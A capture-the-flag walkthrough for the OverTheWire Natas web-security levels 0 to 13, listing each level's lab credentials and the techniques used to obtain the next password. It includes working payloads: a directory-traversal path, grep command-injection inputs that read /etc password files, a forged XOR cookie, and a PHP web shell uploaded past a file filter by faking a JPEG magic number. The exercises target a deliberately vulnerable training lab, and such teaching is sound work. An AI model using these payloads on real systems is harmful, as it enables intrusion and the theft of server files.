Level 0
Access the website with the link : http://natas0.natas.labs.overthewire.org .
Insert the credentials :
username : natas0
password : natas0

​

We see a page with written that we will find the password for the next level in this page.
If look in the page we can see there is only that sentence and the background, a good way to start to analyze a webpage and discover more info about it is to view its source code.

​

To view a "page soure" right click with the mouse on the page and select "view page source", another tab will open in the browser showing us the code behind the page.

​

Viewing the code we can see there are 2 comments, highlighted in green, and thee second one contains exactly what we are looking for, the password for level 1, which is : g9D9cREhslqBKtcA2uocGHPfMZVzeFK6
 

​

Level 0 -> 1
Access the website with the link : http://natas1.natas.labs.overthewire.org .
Insert the credentials :
username : natas1
password : g9D9cREhslqBKtcA2uocGHPfMZVzeFK6

​

Once we log-in we can read that this time the right click has been blocked, meaning that probably the password is again in the home page source but we need to find another way to view it.

​

There are some ways around here, i will explain 2 easy and quick ones:

• The first one is to open the developer tools in your web browser, to do it click the option menu in the top right of the browser, chose more tools, than developer tools, once you have it open you can see the page elements, extend the different forms and here we have the password as a comment like in the last level.

• Another way is to run a script blocker extension in your browser, since they deactivated the right click with javascript if we block the code from executing we will see the page with the right click enabled, than we can proceede as in level0.

 

Whether you have choosen method 1 or 2 you will be able to see the password for level2 : h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7

 

Extra Mile
If you have time or wanna practice with some pentesting tools you can even get the password by using burp suite, even tho in this case is preatty inconvenient as it is way longer.
You will need to use the proxy module to capture the initial request to the page, send it to repeater, send the request and than you will be able to see the response showing the full page source.
 

​

Level 1 -> 2
Access the website with the link : http://natas2.natas.labs.overthewire.org .
Insert the credentials :
username : natas1
password : h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7

​

This time we get an hint telling us that there is nothing in this page, anyway we want always to check the page source for extra info.

​

When we see the page source we can notice that there is a call for an image, if we click on the link we see a very small white square.... not usefull.

Looking again in the source code we see that the image is in a directory called "files", maybe we can go inside of it and see if there are any usefull ones, to do it add "/files" in the URL.

​

Here near the image file there is a text file called "users.txt", we can open it by clicking on it and we can see a list of usernames and passwords, and luckly enough there is also the oune for natas3 : G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q
 

​

Level 2 -> 3
Access the website with the link : http://natas3.natas.labs.overthewire.org .
Insert the credentials :
username : natas3
password : G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q

​

Let's view again the page source, but this time we see a comment in the code saying that there are no more information leaks, this means that we have to find a new way to discover the password.

​

The sentence also tells us another curious thing, that even Google wont be able to find it.... ;
So a little bit of theory : when you create a website and you post it online Google will crwal and index all the pages of your website, so the people will be able to search for each and the content inside of it. But what if you don't want a search engine to index one of more pages? You create a file called "robots.txt" and all the pages inside this text files will be automatically ignored and not indexed.

​

Knowing this we can change the url by adding /robots.txt and see if that's the case.
Looks like there is a page that has been hidden, with the name of "/s3cr3t/", let's visit it by adding that to the end of the URL (remember to remove /robots.txt first); we can see a page source and a call for a document which name is "users.txt", we can double click on it to open the link.

​

And a new page open with the password for natas4 : tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm
 

​

Level 3 -> 4
Access the website with the link : http://natas4.natas.labs.overthewire.org .
Insert the credentials :
username : natas4
password : tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

​

This time, as we can read when we open the website, in order to view the password we need to appear as if we connected to this site coming from http://natas5.natas.labs.overthewire.org/ .

​

When you visit a website you automatically send a request with many HTTP headers that serve the purpose of giving you the content you want for the platform you are using, in our case the header we are interested in is called Referer, it is used to tell a website from which website we are coming from (if any).

​

In this case we want to manipulate that value to make it looks like we are coming from the level5 website.

​

Again there are different ways, this time i will explain the Burp Suite one and later give an hint for an easier method.

 

So open Burp Suite, go in the proxy section and start up the built in browser, visit again the current level website and log in;
Now back into the proxy section, enable the proxy by clicking on "intercept" and make it turn blue, go back to the browser and reload the page.
Doing this you will receive the HTTP request, right click and tap on "send to repeater", here we will add the header to forge a new request making us looks like we are coming from natas5.

​

In the raw code, after the user agent part, add a new line with this :

Referer: http://natas5.natas.labs.overthewire.org/

​

Now the request is ready, click on "send" and we will receive the response.

​

The response is like the page source we have analyzed before, scroll down ad you will find the password : Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD

​

Easier Method
After completing the challenge i have noticed that some browsers offer an extension to change the referrer, downloading it will proably make the whole process faster as, once in the website page you can open your extension and type in the referrer of your choice.
Remember to vet the extensions before installing them ;) .
 

​

Level 4 -> 5
Access the website with the link : http://natas5.natas.labs.overthewire.org .
Insert the credentials :
username : natas5
password : Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD

​

When the sites open we get the message "Access disallowed. You are not logged in"...

​

In the website where you can login there are the "session cookies" these are used, as we can imagine, to sign the session, and they will change value once you log in and establish your own session in the site.

​

Let's check if it is the case, we can open the "developer tools" from the option menu of the browser, than on the top navigate to "Application" and now on the left panel choose cookies, you should see the URL of the natas page, click on it.

​

Now we can see which cookies are active here and their value, here we can see a cookie called "loggedin" with the value of 0.

 

Normally cookies, expecially session ones, will have a very long and complicated value to avoid the risk of session hijacking, here since the value is only "0" and we got the error message before, we can guess that "0" is for session closed and "1" for session established.

​

With this knowledge we can now change the cookie's value, tap on the "0", right click and chose "edit value", make it "1".

 

At this poin we need to refresh the webpage, re-insert our credential of the level and we will have the password for natas6 displayed : fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR
 

​

Level 5 -> 6
Access the website with the link : http://natas6.natas.labs.overthewire.org .
Insert the credentials :
username : natas6
password : fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR

This time we can see there is a box where we have to submit a secret code, there is also an option to check the source code, let's view it.

The script is preatty simple, it will check if the secret we submit is the same as the one it has in memory, if so it will print the password for natas7.

The problem is that we don't know the secret code...yet. In fact if we look again at the code we can see that it includes a file, we can imagine that in that file is stored the secret code where the script will look for the match.
We can try to see if we can reach it with our browser, add at the end of the URL "/includes/secret.inc", luckly enought we get a page with the value of secret : FOEIUWGHFEEUHOFUOIU .

At this point we can copy and submit it going back into the main page, and like magic we get the password for the next level : jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr
 

​

Natas 6 -> 7
Access the website with the link : http://natas7.natas.labs.overthewire.org .
Insert the credentials :
username : natas7
password : jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr

 

The home page seems showing nothing much, let's view the page sourve and we can notice a comment wit an hint that says our password for level 8 is located in /etc/natas_webpass/natas8 .

​

In order to reach that directory we can use a tecnique called directory traversal, in a few word it consists in evading the normal path to reach a file, allowing us to see other files and directories that we should not normally see.

​

This is usually achieved by exploiting a php function, usually a legitimate one that calls for a file, we can than manipulate it to get another file (the one hidden that we want).

​

To do it i have noticed that when we click in the home page to one of the links (home or about), the URL changes and it add a php funcion calling for the files that contains the home or about page.

 

Knowing this i edited the url :

1. Remove the last word (about or home depending on which link you have clicked on)

2. We want to escape the current directory and go back to the root one, so we can than move to the one containing the password, so i crafted this part that we want to add after the "=" simbol :
   ../../../../etc/natas_webpass/natas8

3. Now press ENTER and the password will be displayed on your screen : a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB

​

​

Natas 8
Access the website with the link : http://natas8.natas.labs.overthewire.org .
Insert the credentials :
username : natas8
password : a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB

​

This time we have again a form where we have to insert a secret code, let's click on the "view source code" link to understeand what is going on behind the scene.

​

The script will encode a secret and if it finds a match it will provide us with the pasword we are looking for.
We can also notice in the first line that there is the value of the encoded secret already written in the code, what we have to do is to decode it, find the original secret and submit it.

​

The secret, as we can see in the script, has been encoded multiple times, so in order to decode it we have to go trough some passages in reverse order from the script :
(You can find plenty of tools online for this actions, chose the one you prefer, you can even create your own script to do all the job if you like)

​

Encoded secret = 3d3d516343746d4d6d6c315669563362

1. Decode bin2hex
   we will get this : ==QcCtmMml1ViV3b

2. Reverse it
   and we get this : b3ViV1lmMmtCcQ==

3. Decode the base64 string
   And we finally get the secret: oubWYf2kBq

​

Now insert that code in the form, press submit and you will see the password for natas9 : Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd

​

The Hard Way
We have jsut seen how to decode the initial encoded secred by using multiple different tools online, BUT there is another way to do it, create your own script to automate the process.

Since the first script was made in PHP i have created another PHP script that does the decoding, i have written it line per line so everyone will be able to view all the steps that the script does, like the ones we did before.

I think seeing this will might help you getting started viewing some programming languages and how they work, if you already know the foundamentals and wanna push trough i suggest you to create your own script and then maybe optimize it.

​

<?php

$hex = "3d3d516343746d4d6d6c315669563362";

$bin = hex2bin($hex);

$reverse = strrev($bin);

$secret = base64_decode($reverse);

print ($secret);

?>

​

Than save the file as .php and to get the result run :

php script.php

 

​

Natas 9
Access the website with the link : http://natas9.natas.labs.overthewire.org .
Insert the credentials :
username : natas9
password : Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd

​

There is again a form, where we have to insert a word/string to search, checking the code we can see that it will search for that value with grep inside a document called "dictionary.txt".

​

Once more there are several ways to find the solution.
One is to escape the function abusing the grep binary and knowing how it works, let's break it down :

I

n the sourcecode we see this part

grep -i $key dictionary.txt

​

What is does is using the grep binary to search into the txt file the word we have submitted, BUT what if i tell you that we can change how it works just by submitting a couble of right words and simbols?

​

Now clearly looking at the code we can do nothing about the grep -i part, but what if, at the place of the variable, we were able to tell grep to print something else in another document in another directory, maybe the one that we know is holding the password for the next level.

​

We can achieve this by submitting

"" /etc/natas_webpass/natas10

Doing this we are telling grep to give us all the content of either the natas10 file and the dictionary file.

The first line displayed will show us the password : D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE

​

Note: there are other combinations of words-caracthers you can use, like ; and than cat command, using one or another will vary slighty the output but you should be able to see the password strings anyway.
 

​

Natas 10
Access the website with the link : http://natas10.natas.labs.overthewire.org .
Insert the credentials :
username : natas10
password : D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE

​

We can see again a form where we can search for words, but this time it tells us that a filter for certain characters has been added for security reasons.

​

Viewing the source code we can check which characters are forbidden so we can better understeand how to move:

if(preg_match('/[;|&]/',$key))

{ print "Input contains an illegal character!";

​

If you have followed my previous task write up you will notice that the same strategy used before will work here as well without any differences, even though there is a filter this time, this is because the double quote "" i decided to use even before will kinda close the filtering function, allowing again the other special characters.

​

So, as we know what is the location for the level 11 passowrd we can write the path there, so the grep function will display us the file content

"" /etc/natas_webpass/natas11

The first line displayed will show us the password: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg

​

​

Natas 11
Access the website with the link : http://natas11.natas.labs.overthewire.org .
Insert the credentials :
username : natas11
password : 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg

​

In this level we can see another form, where we can insert a color hex value to change the background, there is also a sentence that informs us that cookies are protected with XOR encryption.

​

Let's begin by reading the source code behind this functions:

​

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
  $key = '<censored>';
  $text = $in;
  $outText = '';

  // Iterate through each character
  for($i=0;$i<strlen($text);$i++) {
  $outText .= $text[$i] ^ $key[$i % strlen($key)];
  }

  return $outText;
}

function loadData($def) {
  global $_COOKIE;
  $mydata = $def;
  if(array_key_exists("data", $_COOKIE)) {
  $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
  if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
       if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
       $mydata['showpassword'] = $tempdata['showpassword'];
       $mydata['bgcolor'] = $tempdata['bgcolor'];
       }
  }
  }
  return $mydata;
}

function saveData($d) {
  setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
  if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
       $data['bgcolor'] = $_REQUEST['bgcolor'];
  }
}

saveData($data);

?>
 

This time the code is a bit more complex so let's break it down to understeand what exactly is happening and how we can retrive our password.

​

1. At first an array containing the default "showpassword" and "bgcolor" properties is declared.

2. Than we can se 3 functions :

   • The first one is taking care of the XOR encryption

   • The second one will work to load the data

   • And the last one will save the data

3. Finally there is a check and if the bgcolor key exist and matchs the characters listed, it will update the $data with the value from the $_REQUEST and at the end it calls tht savadata function with $data to save it in an encoded cookie.

​

Without going too much into details and making this long, we can see that in the first declared array the showpassword value is set to "no", as we can imagine we want a work to change that value somehow into a "yes".

​

More specifically we want to create a new valid cookie, which once is decoded will contain the same array as the one we have analyzed but with the "yes" value.

​

Now we firstly have to understeand how the XOR encryption works:
Aftere a brief research online i understood that this encryption is a type of cipher called additive, meaning that operates on this on this principles:

A ⊕ 0 = A

A ⊕ A = 0

A ⊕ B = B ⊕ A

(A ⊕ B) ⊕ C = A ⊕ (B ⊕ C)

(B ⊕ A) ⊕ A = B ⊕ 0 = B

​

Where ⊕ is the exclusive disjunction operation... basically as we can see a kind of subtraction.
So to decrypt the ouput we can symply reapply the XOR function with the key.

​

In our scenario we need the encrypted text, the key and with this 2 using the XOR function we can view the original plain text. But there is one problem the key value is censored.

​

Luckly enough applying the XOR method we can retreive the key knowing ciphertext XOR plaintext = key .

​

We can start the process by viewing the cookie value in our browser, to do it open the dev tools, go under storage and than cookies, here you can see the value:
MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY3D --> the final %3D is the encoded value of =. --> MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY=
So we now know that this strig contains the showpassword="no" and we want a yes.

​

Now we can create a script to make a cookie that is not XOR encrypted so we can than use this and the encrypted ones to get the key.

<?php

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

echo base64_encode(json_encode($defaultdata));

?>

You can execute this on a php sandbox website online and you will get this value: eyJzaG93cGFzc3dvcmQiOiJubyIsImJnY29sb3IiOiIjZmZmZmZmIn0=

Now is time to get out key
For this step you can either craft another script or go on a website like https://cyberchef.org/ , here you want to chose the receipe "from base 64" and than "XOR", as key put the non-encrypted cookie and set the type as base 64; now input the encrypted cookie and you will get the key KNHL

We are almost there, let's now craft the new cookie
Still in cyberchef, now chose first the XOR receipe and than "to base 64", here we want to put the key and set it as UTF-8 type with the standart scheme; in the input put wat we want to change so: {"showpassword":"yes","bgcolor":"#ffffff"}.

In my case this is the new cookie i got: MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz

Now that we have our new cookie go back into your browser in the natas11 page, open dev tools, edit the previous cookie with the new one and press enter, than in the for click the set color botton and the password for natas12 will be displayed on screen: YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG

​

​

Natas 12
Access the website with the link : http://natas12.natas.labs.overthewire.org .
Insert the credentials :
username : natas12
password : YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG

​

When opening the website we can notice that there is a form where we can chose and than upload a file.
We can click on "View source code" to better understeand what is happening behind this form.

​

There is a php script where we can see that only files under 1000 are accepted, also when we upload a file the name of the upload will be changed with a random string that ends with .jpg.

​

What we want to do is to initiate a web shell so we can than execute commands and retrieve our password for level 13.
O

ne way is to create a simple php web shell like this one:

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Than we can save it as web_shell.php on our device, but remember that the name is not important rn as it will be changed anyway by the script.

​

We can then select our file, but we want to inject ourselves in the middle of the request and change the name that has been given, we want to remove the .jpg and rename it as .php.

There are 2 main ways to do it:

1. Intercept the request when choosing the file with burp suite, send it to repeater and before sending the request to the server, find and rename the extension.

2. Use dev tools on any browsers:

   • Choose the file

   • Open dev tools and under the elements tab locate the .jpg extension,

   • Click on it and choose "edit as html"

   • Change to .php

​

Ok now we are ready to click upload and we can see that our file has been uploaded with the right extension, click on it.

Now we get an index notice, is fine just add ?e=ls at the end of the url and it will show us some files that has been uploaded.

This means that we successfully managed to execute code on the server, now is time go haunt for the password.

​

We already know from the previous levels that the passwords are all located in the same directory called: natas_webpass
So let's edit the url again, remove the code that we added before and replace it with this one

?e=cat%20/etc/natas_webpass/natas13

​

Press ENTER and the password will be displayed on the screen : lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9
 

​

Natas 13
Access the website with the link : http://natas13.natas.labs.overthewire.org .
Insert the credentials :
username : natas13
password : lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9

​

Once again we have a web-form where we can submit a file, this time it tells us that it is only accepting JPEG files for security reasons.
The file size also has to be of max 1KB.

​

Let's start by creating a php script that will give us a shell, as on level 12

nano shell.php

paste inside this and save:

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

​

Let's verify if it actually filter for images, we can chose our shell file created in the previous level and implement the same method...ok this time is actually different, in fact we get the message "File is not an image", we need to find a way around.

At this point i firstly went for the easiest try, uploading the shell file with a double extension like this: shell.php.jpg but the site understood that the file was still not an image.

Now i know that there is for sure:

• File size filtering;

• File extension filtering;

• Possibly mime type or magic number filtering, let's test this one.

I want to check if also the magic number filtering has been implemented, to do so we have to edit the first 4 couple of digits in the file hex view, those are the one used to identify a certain file type, so i want to fake it is a jpeg file ad use it's magic number.

​

Let's use a binary to edit the file

hexedit shell.php

Substitute the first block with this one: FF-D8-FF-E0 and that press CRTL + X to save and exit.

​

Now i try to upload the file and finally it accepts it, but there is a problem, the shell doesn't work; looking at the output on the screen i realized that, because we edited the magic number, we also have to modify the original script in the shell, to preserve our php.

All we have to do is add jpeg at front

jpeg<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

​

Now we can go back in hexedit, edit the first 4 bytes and upload the file.

​

Remember that because the website filter script is also changing our file extension we have to open devtools or use burpsuite to change it back to php as we did on level 12, than navigate to the uploaded file.

​

Now we are ready to get our treasure, go in the URL and add this at the end, to navigate and open the file containing the natas 14 password

?e=cat%20/etc/natas_webpass/natas14

​

And finally we got the password for level 14 : qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP

​

​